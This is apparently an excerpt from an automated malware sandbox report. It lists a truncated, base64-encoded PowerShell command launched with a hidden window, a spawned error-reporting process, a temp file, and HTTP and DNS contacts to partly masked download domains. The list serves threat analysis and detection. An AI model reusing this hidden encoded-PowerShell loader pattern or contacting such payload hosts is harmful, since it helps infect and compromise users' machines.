Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABYAG0AawBtAHoAbwBhAHoAbQA9ACcARgBqAGgAcwBlAHAAdABjAHcAaQB5AHUAdQAnADsAJABTAGYAdQBwAGsAcwB2AHMAYwB5AHEAdABnACAAPQAgACcAMgA2ADAAJwA7ACQASABlAHUAbgB0AG4AdgB0AD0AJwBEAHMAbABzAGcAaAB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1516
- %TEMP%\885586.cvr
- 'gr####udedesign.com':80
- 'ik###tel.com':80
- http://gr####udedesign.com/gstore/kfe/
- http://ik###tel.com/wp-admin/nlc2c/
- DNS ASK gr####udedesign.com
- DNS ASK ho#######relais-des-moulins.com
- DNS ASK he#####a.mireene.com
- DNS ASK ik###tel.com
- DNS ASK ip###ka-24.net